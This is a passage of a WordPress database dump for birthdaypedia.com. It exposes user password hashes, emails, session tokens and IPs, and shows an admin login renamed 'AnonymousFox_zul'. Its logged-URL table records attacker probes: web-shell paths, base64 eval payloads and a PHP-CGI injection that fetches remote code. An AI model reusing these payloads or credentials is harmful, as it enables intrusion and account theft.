INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','wpengine'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description','This is the \"wpengine\" admin user that our staff uses to gain access to your admin area to provide support and troubleshooting. It can only be accessed by a button in our secure log that auto generates a password and dumps that password after the staff member has logged in. We have taken extreme measures to ensure that our own user is not going to be misused to harm any of our clients sites.'),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(13,1,'show_welcome_panel','1'),(14,2,'nickname','birthdaypedia'),(15,2,'first_name','BirthdayPedia'),(16,2,'last_name','Staff'),(17,2,'description',''),(18,2,'rich_editing','true'),(19,2,'comment_shortcuts','false'),(20,2,'admin_color','fresh'),(21,2,'use_ssl','0'),(22,2,'show_admin_bar_front','true'),(23,2,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(24,2,'wp_user_level','10'),(25,2,'default_password_nag',''),(26,2,'session_tokens','a:1:{s:64:\"7e22fd598417a3f6ec2324abd4df47297506bb6e23e23e22fff7764b17d9bdb6\";a:4:{s:10:\"expiration\";i:1521234662;s:2:\"ip\";s:13:\"65.209.60.146\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\";s:5:\"login\";i:1521061862;}}'),(27,2,'wp_dashboard_quick_press_last_post_id','658'),(28,2,'dismissed_wp_pointers','wp410_dfw,vc_pointers_backend_editor,vc_columns_pointer,wp390_widgets,ampforwp_subscribe_pointer'),(29,2,'wp_user-settings','hidetb=1&libraryContent=browse&editor=tinymce&wplink=1&imgsize=large&edit_element_vcUIPanelWidth=650&edit_element_vcUIPanelLeft=788px&edit_element_vcUIPanelTop=74px'),(30,2,'wp_user-settings-time','1480000696'),(31,2,'closedpostboxes_post','a:1:{i:0;s:30:\"td_post_theme_settings_metabox\";}'),(32,2,'metaboxhidden_post','a:6:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(33,2,'managenav-menuscolumnshidden','a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),(34,2,'metaboxhidden_nav-menus','a:3:{i:0;s:8:\"add-post\";i:1;s:12:\"add-post_tag\";i:2;s:15:\"add-post_format\";}'),(35,2,'nav_menu_recently_edited','34'),(48,2,'wpseo_ignore_tour','1'),(155,2,'_yoast_wpseo_profile_updated','1516808816'),(158,1,'_yoast_wpseo_profile_updated','1490209832'),(193,2,'wp_yoast_notifications','a:3:{i:0;a:2:{s:7:\"message\";s:774:\"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href=\"https://yoa.st/rate-yoast-seo?utm_content=6.2\">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href=\"https://yoa.st/bugreport?utm_content=6.2\">please file a bug report</a> and we\'ll do our best to help you out.\n\nBy the way, did you know we also have a <a href=\'https://yoa.st/premium-notification?utm_content=6.2\'>Premium plugin</a>? It offers advanced features, like a redirect manager and support for multiple keywords. It also comes with 24/7 personal support.\n\n<a class=\"button\" href=\"https://birthdaypedia.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell\">Please don\'t show me this notification anymore</a>\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:19:\"wpseo-upsell-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:1;a:2:{s:7:\"message\";s:371:\"The <strong>Text link counter</strong> feature (introduced in Yoast SEO 5.0) is currently disabled. For this feature to work Yoast SEO needs to create a table in your database. We were unable to create this table automatically.\n Please read the following <a href=\"https://yoa.st/15o?utm_content=6.2\">knowledge base article</a> to find out how to resolve this problem.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:32:\"wpseo-links-table-not-accessible\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:2;a:2:{s:7:\"message\";s:458:\"Yoast SEO and AMP can work together a lot better by adding a helper plugin. Please install <a href=\"https://birthdaypedia.com/wp-admin/update.php?action=install-plugin&plugin=glue-for-yoast-seo-amp&_wpnonce=1d011a4121\">Yoast SEO AMP Glue</a> to make your life better. <a href=\"https://wordpress.org/plugins/glue-for-yoast-seo-amp/\" aria-label=\"More information about Yoast SEO AMP Glue\" target=\"_blank\" rel=\"noopener noreferrer\">More information</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:35:\"wpseo-suggested-plugin-yoastseo-amp\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:15:\"install_plugins\";}s:16:\"capability_check\";s:3:\"all\";}}}'),(273,2,'community-events-location','a:1:{s:2:\"ip\";s:11:\"65.209.60.0\";}'),(274,2,'wpseo_title',''),(275,2,'wpseo_metadesc',''),(276,2,'wpseo_metakey',''),(277,2,'wpseo_excludeauthorsitemap',''),(278,2,'wpseo_content_analysis_disable',''),(279,2,'wpseo_keyword_analysis_disable',''),(280,2,'syntax_highlighting','true'),(281,2,'locale',''),(282,2,'googleplus',''),(283,2,'twitter',''),(284,2,'facebook',''),(285,2,'behance',''),(286,2,'blogger',''),(287,2,'delicious',''),(288,2,'deviantart',''),(289,2,'digg',''),(290,2,'dribbble',''),(291,2,'evernote',''),(292,2,'flickr',''),(293,2,'forrst',''),(294,2,'grooveshark',''),(295,2,'instagram',''),(296,2,'lastfm',''),(297,2,'linkedin',''),(298,2,'mail-1',''),(299,2,'myspace',''),(300,2,'path',''),(301,2,'paypal',''),(302,2,'pinterest',''),(303,2,'reddit',''),(304,2,'rss',''),(305,2,'share',''),(306,2,'skype',''),(307,2,'soundcloud',''),(308,2,'spotify',''),(309,2,'stackoverflow',''),(310,2,'steam',''),(311,2,'stumbleupon',''),(312,2,'tumblr',''),(313,2,'vimeo',''),(314,2,'vk',''),(315,2,'windows',''),(316,2,'wordpress',''),(317,2,'yahoo',''),(318,2,'youtube',''),(319,9,'nickname','akm123'),(320,9,'first_name','new'),(321,9,'last_name','owner'),(322,9,'description',''),(323,9,'rich_editing','true'),(324,9,'syntax_highlighting','true'),(325,9,'comment_shortcuts','false'),(326,9,'admin_color','fresh'),(327,9,'use_ssl','0'),(328,9,'show_admin_bar_front','true'),(329,9,'locale',''),(330,9,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(331,9,'wp_user_level','10'),(332,9,'_yoast_wpseo_profile_updated','1516812127'),(333,9,'dismissed_wp_pointers','ampforwp_subscribe_pointer'),(334,9,'session_tokens','a:1:{s:64:\"dd8c103b4dbd2d9cf8e533159db9003fba045955152327ee7d16050d2b7f72d8\";a:4:{s:10:\"expiration\";i:1596724337;s:2:\"ip\";s:13:\"183.83.255.16\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36\";s:5:\"login\";i:1596551537;}}'),(335,9,'wp_dashboard_quick_press_last_post_id','658'),(336,9,'wp_yoast_notifications','a:3:{i:0;a:2:{s:7:\"message\";s:774:\"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href=\"https://yoa.st/rate-yoast-seo?utm_content=6.2\">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href=\"https://yoa.st/bugreport?utm_content=6.2\">please file a bug report</a> and we\'ll do our best to help you out.\n\nBy the way, did you know we also have a <a href=\'https://yoa.st/premium-notification?utm_content=6.2\'>Premium plugin</a>? It offers advanced features, like a redirect manager and support for multiple keywords. It also comes with 24/7 personal support.\n\n<a class=\"button\" href=\"https://birthdaypedia.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell\">Please don\'t show me this notification anymore</a>\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:19:\"wpseo-upsell-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.80000000000000004;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:1;a:2:{s:7:\"message\";s:371:\"The <strong>Text link counter</strong> feature (introduced in Yoast SEO 5.0) is currently disabled. For this feature to work Yoast SEO needs to create a table in your database. We were unable to create this table automatically.\n Please read the following <a href=\"https://yoa.st/15o?utm_content=6.2\">knowledge base article</a> to find out how to resolve this problem.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:32:\"wpseo-links-table-not-accessible\";s:5:\"nonce\";N;s:8:\"priority\";d:0.80000000000000004;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:2;a:2:{s:7:\"message\";s:458:\"Yoast SEO and AMP can work together a lot better by adding a helper plugin. Please install <a href=\"https://birthdaypedia.com/wp-admin/update.php?action=install-plugin&plugin=glue-for-yoast-seo-amp&_wpnonce=d2c161cb8d\">Yoast SEO AMP Glue</a> to make your life better. <a href=\"https://wordpress.org/plugins/glue-for-yoast-seo-amp/\" aria-label=\"More information about Yoast SEO AMP Glue\" target=\"_blank\" rel=\"noopener noreferrer\">More information</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:35:\"wpseo-suggested-plugin-yoastseo-amp\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:15:\"install_plugins\";}s:16:\"capability_check\";s:3:\"all\";}}}'),(337,9,'community-events-location','a:1:{s:2:\"ip\";s:12:\"183.83.255.0\";}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT '',
`user_pass` varchar(255) NOT NULL DEFAULT '',
`user_nicename` varchar(50) NOT NULL DEFAULT '',
`user_email` varchar(100) NOT NULL DEFAULT '',
`user_url` varchar(100) NOT NULL DEFAULT '',
`user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`user_activation_key` varchar(255) NOT NULL DEFAULT '',
`user_status` int(11) NOT NULL DEFAULT 0,
`display_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`),
KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_users`
--
LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'AnonymousFox_zul','e1f5c3f0f8a33181cc655602380ae5da','wpengine','bitbucket@wpengine.com','http://wpengine.com','2015-04-27 23:02:47','',0,'wpengine'),(2,'birthdaypedia','$P$Bz.OewJoCo.Zi/FLhnVrZ4JRTuE7Aw.','birthdaypedia','glowens@gmail.com','https://birthdaypedia.com','2015-05-20 00:42:59','1480518796:$P$BrKYzU2lmDREmhN9kv9Ba72SeA/suU.',0,'BirthdayPedia'),(9,'akm123','$P$BC0Ys2KP8vO/w9dYrq20uyClSa5PMC0','akm123','glowens@rave.media','','2018-01-24 16:42:07','1516812127:$P$Bx1sgdIendaea8DRyBFdTJCXmdcEFF1',0,'new owner');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wpss_clear`
--
DROP TABLE IF EXISTS `wp_wpss_clear`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpss_clear` (
`priority` int(5) unsigned DEFAULT 0,
`url` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`url`),
KEY `priority` (`priority`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wpss_clear`
--
LOCK TABLES `wp_wpss_clear` WRITE;
/*!40000 ALTER TABLE `wp_wpss_clear` DISABLE KEYS */;
INSERT INTO `wp_wpss_clear` VALUES (1,''),(1,'/'),(1,'/!==b.className,k.style=/top/.test(d.getAttribute('),(1,'/),0)/100,n=h*a,o=c*a;'),(1,'/,.php'),(1,'/,u=100*(T/m)+'),(1,'/.bashrc'),(1,'/.bash_history'),(1,'/.bash_profile'),(1,'/.cache.php?localdate=902239FSmakovSHELL&localtime=free'),(1,'/.config.php'),(1,'/.cpanel_config.php'),(1,'/.db_config'),(1,'/.default'),(1,'/.includes.php?ver_full&token=1257'),(1,'/.info.php?ver_full&token=1257'),(1,'/.joomla.system.php'),(1,'/.logs'),(1,'/.old'),(1,'/.private'),(1,'/.queries'),(1,'/.query'),(1,'/.secret'),(1,'/.tag-generatorbackup.php?ver_full&token=1257'),(1,'/.temp'),(1,'/.well-known/apple-app-site-association'),(1,'/.well-known/assetlinks.json'),(1,'//1234t.php'),(1,'//?format=rss'),(1,'//?gf_page=upload'),(1,'//admin/'),(1,'//birthdaypedia.com/wp-comments-post.php?wpe-comment-post=birthdaypedia'),(1,'//components/com_media/index.php?nila2114&dini'),(1,'//feed/'),(1,'//images/stories/0day.php'),(1,'//images/stories/3xp.php'),(1,'//images/stories/food.php'),(1,'//images/stories/Palestine.php'),(1,'//images/stories/vito.php'),(1,'//images/xxu.php'),(1,'//index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2'),(1,'//index.php?option=com_jdownloads&Itemid=0&view=upload'),(1,'//jegraisos.php'),(1,'//license.php'),(1,'//modules/mod_simplefileuploadv1.3/elements/03432699.php'),(1,'//modules/mod_simplefileuploadv1.3/elements/4458374.php'),(1,'//modules/mod_simplefileuploadv1.3/elements/udd.php'),(1,'//MyAdmin/scripts/setup.php'),(1,'//plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='),(1,'//pma/scripts/setup.php'),(1,'//rss/'),(1,'//sites/default/files/up.php'),(1,'//templates/atomic/index.php'),(1,'//templates/beez/index.php'),(1,'//templates/beez5/index.php'),(1,'//templates/beez_20/index.php'),(1,'//templates/ja_purity/index.php'),(1,'//templates/rhuk_milkyway/index.php'),(1,'//wordpress'),(1,'//wp-content/plugins/11172305.php'),(1,'//wp-content/plugins/formcraft/file-upload/server/php/upload.php'),(1,'//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php'),(1,'//wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=3'),(1,'//wp-content/plugins/woocommerce-product-options/includes/image-upload.php'),(1,'//wp-content/plugins/wp-lg3.php'),(1,'//wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php'),(1,'//wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php'),(1,'//wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php'),(1,'//wp-content/uploads/2016/9/28512844.php'),(1,'//wp-content/uploads/2016/9/3839274.php'),(1,'//wp-content/uploads/files/guest/05289766.php'),(1,'//wp-content/uploads/files/guest/27662672.php'),(1,'//wp-content/uploads/wp-any.php'),(1,'//wp-content/uploads/wpfoot1.php'),(1,'//wp-includes/js/tinymce/skins/wordpress/images/wp-manage.php'),(1,'//wp-misc.php'),(1,'//wp-options.php'),(1,'//wpfoot2.php.suspected_'),(1,'/000b13b4-7e20-4e50-8e79-1a7adbfad52d'),(1,'/07002019.php'),(1,'/09854426.php'),(1,'/0e85d80a-c658-45b1-8098-aabe5af73670'),(1,'/1'),(1,'/1.php'),(1,'/11.php'),(1,'/11979.php?cmd=free'),(1,'/1981447.php'),(1,'/20-2/feed/'),(1,'/22a58e66-7b0c-4bd8-abbe-a51c1834718a'),(1,'/23586681.php.suspected_'),(1,'/26aefa19-ac73-4007-ad02-442814136420'),(1,'/3291.php?cmd=free'),(1,'/4005..php'),(1,'/4005.php'),(1,'/404.php'),(1,'/404_error.php'),(1,'/46456.php'),(1,'/47646.php'),(1,'/50-cent'),(1,'/50-cent/'),(1,'/50-cent/feed/'),(1,'/50-cent/recaptcha/api/challenge?k=6LfOYgoTAAAAAInWDVTLSc8Yibqp-c9DaLimzNGM'),(1,'/52073974.php'),(1,'/54526139.php'),(1,'/62454875.php'),(1,'/6452.php?cmd=free'),(1,'/6452.php?cmd=help'),(1,'/68254557.php'),(1,'/6kbbs/'),(1,'/7280675.php'),(1,'/8005189.php'),(1,'/9186455.php'),(1,'/===d?(h/=Z(t,a,100,'),(1,'/===d?h/=Z(t,a,1,'),(1,'/===g?(f=100*(x/d)+'),(1,'/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://73ch.com/2008//components/com_media/m.txt'),(1,'/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://73ch.com/2008//components/com_media/m.txt+-n'),(1,'/?author=0'),(1,'/?author=1'),(1,'/?author=2'),(1,'/?author=3'),(1,'/?author=4'),(1,'/?author=5'),(1,'/?author=6'),(1,'/?author=7'),(1,'/?author=8'),(1,'/?c=4e5e5d7364f443e28fbf0d3ae744a59a'),(1,'/?c=print%28md5%28sund0wn%29%29%3B'),(1,'/?cperpage=1'),(1,'/?cperpage=1&spiderZz=Zz%3A0.6.1'),(1,'/?feed=rss2'),(1,'/?format=rss'),(1,'/?gf_page=upload'),(1,'/?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2'),(1,'/?option=com_jdownloads&Itemid=0&view=upload'),(1,'/?option=com_user&task=register'),(1,'/?option=com_user&view=register'),(1,'/?p=10'),(1,'/?p=115'),(1,'/?p=117'),(1,'/?p=12'),(1,'/?p=120'),(1,'/?p=121'),(1,'/?p=134'),(1,'/?p=135'),(1,'/?p=138'),(1,'/?p=139'),(1,'/?p=141'),(1,'/?p=143'),(1,'/?p=144'),(1,'/?p=146'),(1,'/?p=15'),(1,'/?p=150'),(1,'/?p=152'),(1,'/?p=153'),(1,'/?p=155'),(1,'/?p=156'),(1,'/?p=158'),(1,'/?p=160'),(1,'/?p=162'),(1,'/?p=164'),(1,'/?p=165'),(1,'/?p=167'),(1,'/?p=169'),(1,'/?p=17'),(1,'/?p=171'),(1,'/?p=173'),(1,'/?p=188'),(1,'/?p=194'),(1,'/?p=199'),(1,'/?p=200'),(1,'/?p=201'),(1,'/?p=202'),(1,'/?p=203'),(1,'/?p=211'),(1,'/?p=212'),(1,'/?p=213'),(1,'/?p=214'),(1,'/?p=215'),(1,'/?p=217'),(1,'/?p=218'),(1,'/?p=219'),(1,'/?p=22'),(1,'/?p=220'),(1,'/?p=221'),(1,'/?p=231'),(1,'/?p=233'),(1,'/?p=236'),(1,'/?p=238'),(1,'/?p=240'),(1,'/?p=241'),(1,'/?p=250'),(1,'/?p=252'),(1,'/?p=254'),(1,'/?p=256'),(1,'/?p=258'),(1,'/?p=260'),(1,'/?p=262'),(1,'/?p=265'),(1,'/?p=267'),(1,'/?p=269'),(1,'/?p=272'),(1,'/?p=273'),(1,'/?p=274'),(1,'/?p=275'),(1,'/?p=276'),(1,'/?p=294'),(1,'/?p=295'),(1,'/?p=302'),(1,'/?p=310'),(1,'/?p=313'),(1,'/?p=323'),(1,'/?p=325'),(1,'/?p=327'),(1,'/?p=328'),(1,'/?p=341'),(1,'/?p=342'),(1,'/?p=347'),(1,'/?p=348'),(1,'/?p=356'),(1,'/?p=361'),(1,'/?p=366'),(1,'/?p=367'),(1,'/?p=380'),(1,'/?p=381'),(1,'/?p=390'),(1,'/?p=391'),(1,'/?p=4'),(1,'/?p=40'),(1,'/?p=411'),(1,'/?p=417'),(1,'/?p=42'),(1,'/?p=420'),(1,'/?p=421'),(1,'/?p=422'),(1,'/?p=43'),(1,'/?p=44'),(1,'/?p=449'),(1,'/?p=45'),(1,'/?p=450'),(1,'/?p=451'),(1,'/?p=46'),(1,'/?p=47'),(1,'/?p=48'),(1,'/?p=49'),(1,'/?p=496'),(1,'/?p=497'),(1,'/?p=50'),(1,'/?p=503'),(1,'/?p=505'),(1,'/?p=51'),(1,'/?p=52'),(1,'/?p=53'),(1,'/?p=54'),(1,'/?p=55'),(1,'/?p=56'),(1,'/?p=57'),(1,'/?p=58'),(1,'/?p=59'),(1,'/?p=6'),(1,'/?p=60'),(1,'/?p=61'),(1,'/?p=62'),(1,'/?p=63'),(1,'/?p=64'),(1,'/?p=65'),(1,'/?p=66'),(1,'/?p=67'),(1,'/?p=69'),(1,'/?p=70'),(1,'/?p=71'),(1,'/?p=73'),(1,'/?p=74'),(1,'/?p=75'),(1,'/?p=76'),(1,'/?p=78'),(1,'/?p=79'),(1,'/?p=80'),(1,'/?plugin=all-in-one-event-calendar&controller=ai1ec_exporter_controller&action=export_events&no_html=true'),(1,'/?q=login.destroy.session&r=0.01231231230'),(1,'/?q=user'),(1,'/?s=05.13'),(1,'/?s=13.05'),(1,'/?s=bruce+willis'),(1,'/?s=walter'),(1,'/?s=walter+bruce'),(1,'/?supersonic'),(1,'/?supersonic='),(1,'/a'),(1,'/aaron-paul'),(1,'/aaron-paul/'),(1,'/aaron-paul/feed/'),(1,'/abc.php'),(1,'/about-us'),(1,'/about-us/'),(1,'/adam-sandler'),(1,'/adam-sandler/'),(1,'/adam-sandler/#respond'),(1,'/adam-sandler/feed/'),(1,'/aderwef.php'),(1,'/admin'),(1,'/admin-console'),(1,'/admin.php'),(1,'/admin.php?/cp/login&return='),(1,'/admin/'),(1,'/Admin/Common/HelpLinks.xml'),(1,'/admin/eWebEditor/'),(1,'/admin/fckeditor/editor/'),(1,'/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp'),(1,'/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php'),(1,'/admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp'),(1,'/admin/FCKeditor/editor/filemanager/connectors/php/connector.php'),(1,'/admin/inc/xml.xslt'),(1,'/admin/includes/'),(1,'/admin/index.php'),(1,'/admin/login.php'),(1,'/admin/SouthidcEditor/ewebeditor.asp?id=57&style=southidc'),(1,'/admin/start/index.php'),(1,'/admin/template/article_more/config.htm'),(1,'/admin123/'),(1,'/adminadmin/'),(1,'/admincp/'),(1,'/administrator'),(1,'/administrator/'),(1,'/administrator/index.php'),(1,'/administrator/manifests/files/joomla.xml'),(1,'/adodb.class.php'),(1,'/adodb.class.php?array=ZXZhbCgnZWNobyAxNTIyMzM7Jyk='),(1,'/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/advertise-with-us'),(1,'/advertise-with-us/'),(1,'/ajax.php'),(1,'/ajax.php?nf03c87'),(1,'/ajax.php?qf03c87'),(1,'/ajax/popup-pomo.php'),(1,'/ajax/wp-functions.php'),(1,'/akeeba/popup-pomo.php'),(1,'/alfred-hitchcock'),(1,'/alfred-hitchcock/'),(1,'/alfred-hitchcock/feed/'),(1,'/alias.php'),(1,'/alimail/'),(1,'/allivestr'),(1,'/alt/wp-content/plugins/hello.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/alyson-stoner'),(1,'/alyson-stoner/'),(1,'/alyson-stoner/#respond'),(1,'/alyson-stoner/feed/'),(1,'/amy-adams'),(1,'/amy-adams/'),(1,'/amy-adams/feed/'),(1,'/amy-winehouse'),(1,'/amy-winehouse/'),(1,'/amy-winehouse/#respond'),(1,'/amy-winehouse/feed/'),(1,'/anderson-cooper'),(1,'/anderson-cooper/'),(1,'/anderson-cooper/feed/'),(1,'/andrea-bocelli'),(1,'/andrea-bocelli/'),(1,'/andrea-bocelli/#respond'),(1,'/andrea-bocelli/feed/'),(1,'/andrea-pirlo'),(1,'/andrea-pirlo/'),(1,'/andrea-pirlo/#respond'),(1,'/andrea-pirlo/feed/'),(1,'/angelina-jolie'),(1,'/angelina-jolie/'),(1,'/angelina-jolie/feed/'),(1,'/anna-eleanor-roosevelt-birthday'),(1,'/anna-eleanor-roosevelt-birthday/'),(1,'/anna-eleanor-roosevelt-birthday/feed/'),(1,'/annvicky.php'),(1,'/antonio-banderas'),(1,'/antonio-banderas/'),(1,'/antonio-banderas/feed/'),(1,'/api/api_user.xml'),(1,'/API/DW/Dwplugin/SystemLabel/SiteConfig.htm'),(1,'/API/DW/Dwplugin/TemplateManage/login_site.htm'),(1,'/API/DW/Dwplugin/TemplateManage/manage_site.htm'),(1,'/API/DW/Dwplugin/TemplateManage/save_template.htm'),(1,'/API/DW/Dwplugin/ThirdPartyTags/SiteFactory.xml'),(1,'/app/login.jsp'),(1,'/apple-app-site-association'),(1,'/archiver'),(1,'/archiver/'),(1,'/ariana-grande-pop-singer'),(1,'/ariana-grande-pop-singer/'),(1,'/ariana-grande-pop-singer/feed/'),(1,'/arnold-schwarzenegger'),(1,'/arnold-schwarzenegger/'),(1,'/arnold-schwarzenegger/feed/'),(1,'/article.php'),(1,'/article.php?n0e7f9c'),(1,'/article.php?q0e7f9c'),(1,'/aspcms/'),(1,'/assets/global//plugins/jquery-file-upload/server/php/'),(1,'/assets/global/plugins/jquery-file-upload/server/php/'),(1,'/assets/js/uploadify/uploadify.php'),(1,'/auth/login'),(1,'/author/alex/'),(1,'/author/birthdaypedia'),(1,'/author/birthdaypedia/'),(1,'/author/birthdaypedia/feed'),(1,'/author/birthdaypedia/feed/'),(1,'/author/birthdaypedia/page/2'),(1,'/author/birthdaypedia/page/2/'),(1,'/author/birthdaypedia/page/3'),(1,'/author/birthdaypedia/page/3/'),(1,'/author/birthdaypedia/page/4'),(1,'/author/birthdaypedia/page/4/'),(1,'/author/birthdaypedia/page/5'),(1,'/author/birthdaypedia/page/5/'),(1,'/author/birthdaypedia/page/6'),(1,'/author/birthdaypedia/page/6/'),(1,'/author/juan'),(1,'/author/juan/'),(1,'/author/juan/feed/'),(1,'/author/juan/page/2'),(1,'/author/juan/page/2/'),(1,'/author/juan/page/3'),(1,'/author/juan/page/3/'),(1,'/author/juan/page/4/'),(1,'/author/juan/page/5/'),(1,'/author/juan/page/6/'),(1,'/author/juan/page/7/'),(1,'/author/juan/page/8/'),(1,'/author/juan/page/9'),(1,'/author/juan/page/9/'),(1,'/author/mmanetti/'),(1,'/author/wpengine/'),(1,'/authorize.php'),(1,'/axzwindex.jsp'),(1,'/b02fa792-cdfe-4744-9b91-3ba2c8b5b9e7'),(1,'/b374k-2.8.php'),(1,'/b67b7410-7e61-43ea-9594-06d4efdb797d'),(1,'/backup.php'),(1,'/backup/wp-admin/setup-config.php'),(1,'/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae'),(1,'/barack-obama'),(1,'/barack-obama/'),(1,'/barack-obama/feed/'),(1,'/barry-manilow'),(1,'/barry-manilow/'),(1,'/barry-manilow/feed/'),(1,'/bbs/'),(1,'/bbsmax/'),(1,'/bencandy.php'),(1,'/bernie-mac-birthday'),(1,'/bernie-mac-birthday/'),(1,'/bernie-mac-birthday/feed/'),(1,'/betak.php?cmd=free'),(1,'/beyonce-knowles'),(1,'/beyonce-knowles/'),(1,'/beyonce-knowles/#respond'),(1,'/beyonce-knowles/feed/'),(1,'/BirdsRio.php'),(1,'/birthdaypedia-guest-blogger'),(1,'/birthdaypedia-guest-blogger/'),(1,'/birthdaypedia-guest-blogger/\\\"'),(1,'/birthdaypedia.com/'),(1,'/birthdaypedia.com/20-2/feed/'),(1,'/birthdaypedia.com/wp-comments-post.php?wpe-comment-post=birthdaypedia'),(1,'/birthdaypedia.com/wp-includes/wlwmanifest.xml'),(1,'/birthdaypedia.com/wp-json/'),(1,'/birthdaypedia.com/xmlrpc.php'),(1,'/birthdaypedia.com/xmlrpc.php?rsd'),(1,'/blog'),(1,'/blog.php'),(1,'/blog.php?n7f69dd'),(1,'/blog.php?q7f69dd'),(1,'/blog/'),(1,'/blog//administrator/'),(1,'/blog/wordpress/wp-admin/setup-config.php'),(1,'/blog/wp-admin/'),(1,'/blog/wp-admin/setup-config.php'),(1,'/blog/wp-login.php'),(1,'/blog/xmlrpc.php'),(1,'/blogs/wp-login.php'),(1,'/bookmark.php'),(1,'/bryce-harper-birthday'),(1,'/bryce-harper-birthday/'),(1,'/bryce-harper-birthday/feed/'),(1,'/bypass.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/c0nfi